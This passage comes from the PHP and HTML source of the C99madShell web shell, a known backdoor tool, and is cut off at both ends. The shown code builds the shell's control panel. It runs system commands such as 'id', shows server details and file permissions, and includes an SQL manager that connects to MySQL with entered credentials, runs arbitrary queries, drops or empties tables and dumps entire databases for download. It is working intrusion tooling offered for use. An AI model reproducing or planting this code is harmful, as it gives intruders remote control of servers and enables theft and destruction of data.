FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $d = str_replace("\\\\","\\",$d); $dispd = htmlspecialchars($d); $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); $i = 0; foreach($pd as $b) { $t = ""; $j = 0; foreach ($e as $r) { $t.= $r.DIRECTORY_SEPARATOR; if ($j == $i) {break;} $j++; } echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; $i++; } echo " "; if (is_writable($d)) { $wd = TRUE; $wdt = "<font color=green>[ ok ]</font>"; echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; } else { $wd = FALSE; $wdt = "<font color=red>[ Read-Only ]</font>"; echo "<b>".view_perms_color($d)."</b>"; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE) {$free = 0;} if ($total === FALSE) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; } echo "<br>"; $letters = ""; if ($win) { $v = explode("\\",$d); $v = $v[0]; foreach (range("a","z") as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.":\\");} if ($bool) { $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<font color=green>".$letter."</font>";} $letters .= " ]</a> "; } } if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} } if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "<a href=\"".$item[1]."\">".$item[0]."</a> "; } } echo "</p></td></tr></table><br>"; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; if ($act == "") {$act = $dspact = "ls";} if ($act == "sql") { echo("<form name='sql' method='POST'><input name='act' type='hidden' value='sql'><input name='sql_tbl_insert_q' type='hidden' value=''><input name='sql_login' type='hidden' value=''><input name='kill' type='hidden' value=''><input name='sql_order' type='hidden' value=''><input name='sql_tbl_ls' type='hidden' value=''><input name='sql_tbl_le' type='hidden' value=''><input name='sql_tbl_act' type='hidden' value=''><input name='thistbl' type='hidden' value=''><input name='sql_passwd' type='hidden' value=''><input name='sql_server' type='hidden' value=''><input name='sql_port' type='hidden' value=''><input name='sql_db' type='hidden' value=''><input name='sql_act' type='hidden' value=''><input name='sql_tbl' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''><input name='sql_query' type='hidden' value=''></form>"); if (isset($_POST['sql_login'])) {$sql_login=htmlspecialchars($_POST['sql_login']);} if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);} if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);} if (isset($_POST['sql_port'])) {$sql_port=htmlspecialchars($_POST['sql_port']);} if (isset($_POST['sql_db'])) {$sql_db=htmlspecialchars($_POST['sql_db']);} if (isset($_POST['sql_act'])) {$sql_act=htmlspecialchars($_POST['sql_act']);} if (isset($_POST['sql_tbl'])) {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);} if (isset($_POST['sql_tbl_act'])) {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);} if (isset($_POST['thistbl'])) {$thistbl=htmlspecialchars($_POST['thistbl']);} if (isset($_POST['sql_order'])) {$sql_order=htmlspecialchars($_POST['sql_order']);} if (isset($_POST['sql_tbl_ls'])) {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);} if (isset($_POST['sql_tbl_le'])) {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);} if (isset($_POST['sql_query'])) {$sql_query=htmlspecialchars($_POST['sql_query']);} if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));} if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);} if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);} ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php if ($sql_server) { $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); $err = mysql_smarterror(); @mysql_select_db($sql_db,$sql_sock); if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} } else {$sql_sock = FALSE;} echo "<b>SQL Manager:</b><br>"; if (!$sql_sock) { if (!$sql_server) {echo "NO CONNECTION";} else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();"); $sqlquicklaunch[] = array("Query","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();"); $sqlquicklaunch[] = array("Server-status","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='serverstatus';document.sql.submit();"); $sqlquicklaunch[] = array("Server variables","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='servervars';document.sql.submit();"); $sqlquicklaunch[] = array("Processes","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.submit();"); $sqlquicklaunch[] = array("Logout","#\" onclick=\"document.sql.act.value='sql';document.sql.submit();"); echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} echo "</center>"; } echo "</td></tr><tr>"; if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b> </td><td><b>Database</b> </td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } else { //Start left panel if (!empty($sql_db)) { ?><td width="25%" height="100%" valign="top"><a href="#" onclick="document.sql.act.value='sql';document.sql.sql_login.value='<?echo (htmlspecialchars($sql_login)) ?>';document.sql.sql_passwd.value='<?echo (htmlspecialchars($sql_passwd)) ?>';document.sql.sql_server.value='<?echo (htmlspecialchars($sql_server)) ?>';document.sql.sql_port.value='<?echo (htmlspecialchars($sql_port)) ?>';document.sql.submit();"><b>Home</b></a><hr size="1" noshade><?php $result = mysql_list_tables($sql_db); if (!$result) {echo mysql_smarterror();} else { echo "---[ <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_tbl.value='".htmlspecialchars($row[0])."';document.sql.submit();\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } else { ?><td width="1" height="100" valign="top"><a href="<?php echo $_SERVER['PHP_SELF']; ?>"><b>Home</b></a><hr size="1" noshade><?php $result = mysql_list_dbs($sql_sock); if (!$result) {echo mysql_smarterror();} else { ?><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php $c = 0; $dbs = ""; while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} echo "<option value=\"\">Databases (".$c.")</option>"; echo $dbs; } ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php } //End left panel echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; //Start center panel $diplay = TRUE; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = "no";} echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} echo "</b></center>"; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { $sql_query = urldecode($sql_query); echo "<hr size=\"1\" noshade>"; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";} } if (in_array($sql_act,$acts)) { ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} if ($sql_act == "newtbl") { echo "<b>"; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; } else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = FALSE; echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; $v = join (";",$dmptbls); echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; echo "</form>"; } else { $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; } } else {echo "<b>Dump: nothing to do!</b>";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='structure';document.sql.submit();\">[ <b>Structure</b> ]</a> "; echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='browse';document.sql.submit();\">[ <b>Browse</b> ]</a> "; echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_act.value='tbldump';document.sql.thistbl.value='1';document.sql.submit();\">[ <b>Dump</b> ]</a> "; echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='insert';document.sql.thistbl.value='1';document.sql.submit();\">[ <b>Insert</b> ]</a> "; if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo "<br><br><b>Inserting row into table:</b><br>"; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $sql_query = urldecode($sql_query); $sql_tbl_insert_q = urldecode($sql_tbl_insert_q); $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo "<form method=\"POST\"><input type=hidden name='sql_tbl_act' value='insert'><input type=hidden name='sql_tbl_insert_q' value='".urlencode($sql_tbl_insert_q)."'><input type=hidden name='sql_tbl_ls' value='".$sql_tbl_ls."'><input type=hidden name='sql_tbl_le' value='".$sql_tbl_le."'><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_db\" 